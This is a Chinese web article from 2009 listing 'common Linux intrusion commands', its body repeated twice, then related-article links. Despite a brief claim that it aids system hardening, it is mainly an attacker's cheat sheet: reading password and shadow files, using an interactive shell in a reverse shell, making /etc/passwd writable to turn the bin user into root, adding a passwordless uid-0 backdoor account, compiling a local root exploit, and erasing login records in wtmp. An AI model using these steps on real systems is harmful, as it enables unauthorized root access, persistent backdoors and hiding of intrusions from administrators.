linux 入侵常用命令匯編
更新時(shí)間:2009年07月09日 23:51:28 作者:
掌握這些命令也有助于配置linux的安全,大家可以看看。
cat /etc/passwd 查看linux用戶
cat /etc/shadow 查看用戶密碼需要root權(quán)限
cat /etc/sysconfig/network-scripts/ifcfg-ethn N代表網(wǎng)卡號(hào) 查看所在網(wǎng)卡的ip信息
ifconfig 查看本機(jī)ip信息
cat /etc/resolv.conf 查看DNS信息
bash -i 在反彈的shell中使用可以直觀顯示命令
bash prompt: 當(dāng)你以普通限權(quán)用戶身份進(jìn)入的時(shí)候,一般你會(huì)有一個(gè)類似bash$的prompt。當(dāng)你以Root登陸時(shí),你的prompt會(huì)變成
bash#。
系統(tǒng)變量 : 試著echo "$USER / $EUID" 系統(tǒng)應(yīng)該會(huì)告訴你它認(rèn)為你是什么用戶。
echo 1>/proc/sys/net/ipv4/if_forward是不是你寫錯(cuò)了,應(yīng)該是echo 1>/proc/sys/net/ipv4/ip_forward,
vim /proc/sys/net/ipv4/ip_forward 吧,默認(rèn)是0,也就是內(nèi)核不進(jìn)行數(shù)據(jù)包過濾,改為1 ,讓內(nèi)核對(duì)數(shù)據(jù)包進(jìn)行filter處理!
netstat -an |grep LISTEN |grep :80 查看端口
service --status-all | grep running
service --status-all | grep http
查看運(yùn)行服務(wù)
lsb_release -a 查看系統(tǒng)版本
重啟ssh服務(wù) :/usr/sbin/sshd stop
/usr/sbin/sshd start
ssd_config文件里
PasswordAuthentication no,
將其改為
PasswordAuthentication yes
遠(yuǎn)程ssh才可登錄
否則顯示Access denied
其中Usepam yes可能用來建立pam方式login,比如從其它linux主機(jī)ssh到服務(wù)端,如果關(guān)閉,則不能打開.
su的菜鳥用法
先chomod 777 /etc/passwd
然后修改bin用戶的gid和uid為0
然后passwd設(shè)置bin的密碼
然后cp /bin/bash /sbin/nologin
然后su的時(shí)候su - bin就可以到rootshell了。
這個(gè)原理就是當(dāng)ssh不允許root用ssh終端登陸的時(shí)候,我們又不知道root密碼,的一種很菜鳥的做法
還可以這樣
sed -i s/bin:x:1:1/bin:x:0:1/g /etc/passwd
gcc prtcl2.c –o local –static –Wall
echo "nosec:x:0:0::/:/bin/sh" >> /etc/passwd
echo "nosec::-1:-1:-1:-1:-1:-1:500" >> /etc/shadow
清空l(shuí)ast記錄 cp /dev/null /var/log/wtmp
-----
dd if=/dev/zero of=yourfile bs=10M count=10 建立一個(gè)100m的大文件在利用Linux Kernel <= 2.6.17.4 (proc) Local Root Exploit提權(quán)的時(shí)候要用到的。
cat /etc/shadow 查看用戶密碼需要root權(quán)限
cat /etc/sysconfig/network-scripts/ifcfg-ethn N代表網(wǎng)卡號(hào) 查看所在網(wǎng)卡的ip信息
ifconfig 查看本機(jī)ip信息
cat /etc/resolv.conf 查看DNS信息
bash -i 在反彈的shell中使用可以直觀顯示命令
bash prompt: 當(dāng)你以普通限權(quán)用戶身份進(jìn)入的時(shí)候,一般你會(huì)有一個(gè)類似bash$的prompt。當(dāng)你以Root登陸時(shí),你的prompt會(huì)變成
bash#。
系統(tǒng)變量 : 試著echo "$USER / $EUID" 系統(tǒng)應(yīng)該會(huì)告訴你它認(rèn)為你是什么用戶。
echo 1>/proc/sys/net/ipv4/if_forward是不是你寫錯(cuò)了,應(yīng)該是echo 1>/proc/sys/net/ipv4/ip_forward,
vim /proc/sys/net/ipv4/ip_forward 吧,默認(rèn)是0,也就是內(nèi)核不進(jìn)行數(shù)據(jù)包過濾,改為1 ,讓內(nèi)核對(duì)數(shù)據(jù)包進(jìn)行filter處理!
netstat -an |grep LISTEN |grep :80 查看端口
service --status-all | grep running
service --status-all | grep http
查看運(yùn)行服務(wù)
lsb_release -a 查看系統(tǒng)版本
重啟ssh服務(wù) :/usr/sbin/sshd stop
/usr/sbin/sshd start
ssd_config文件里
PasswordAuthentication no,
將其改為
PasswordAuthentication yes
遠(yuǎn)程ssh才可登錄
否則顯示Access denied
其中Usepam yes可能用來建立pam方式login,比如從其它linux主機(jī)ssh到服務(wù)端,如果關(guān)閉,則不能打開.
su的菜鳥用法
先chomod 777 /etc/passwd
然后修改bin用戶的gid和uid為0
然后passwd設(shè)置bin的密碼
然后cp /bin/bash /sbin/nologin
然后su的時(shí)候su - bin就可以到rootshell了。
這個(gè)原理就是當(dāng)ssh不允許root用ssh終端登陸的時(shí)候,我們又不知道root密碼,的一種很菜鳥的做法
還可以這樣
sed -i s/bin:x:1:1/bin:x:0:1/g /etc/passwd
gcc prtcl2.c –o local –static –Wall
echo "nosec:x:0:0::/:/bin/sh" >> /etc/passwd
echo "nosec::-1:-1:-1:-1:-1:-1:500" >> /etc/shadow
清空l(shuí)ast記錄 cp /dev/null /var/log/wtmp
-----
dd if=/dev/zero of=yourfile bs=10M count=10 建立一個(gè)100m的大文件在利用Linux Kernel <= 2.6.17.4 (proc) Local Root Exploit提權(quán)的時(shí)候要用到的。
相關(guān)文章
阿里云ECS(linux)一鍵安裝web環(huán)境sh安裝步驟
這篇文章主要介紹了阿里云ECS(linux)一鍵安裝web環(huán)境sh安裝步驟,需要的朋友可以參考下2016-10-10Apache實(shí)現(xiàn)禁止中文瀏覽器訪問與301重定向的方法
這篇文章主要介紹了Apache實(shí)現(xiàn)禁止中文瀏覽器訪問與301重定向的方法,通過修改.htaccess的配置來實(shí)現(xiàn)非常簡(jiǎn)便,需要的朋友可以參考下2016-01-01Linux服務(wù)器和docker時(shí)區(qū)修改問題
這篇文章主要介紹了Linux服務(wù)器和docker時(shí)區(qū)修改問題,本文給大家介紹的非常詳細(xì),對(duì)大家的學(xué)習(xí)或工作具有一定的參考借鑒價(jià)值,需要的朋友可以參考下2023-06-06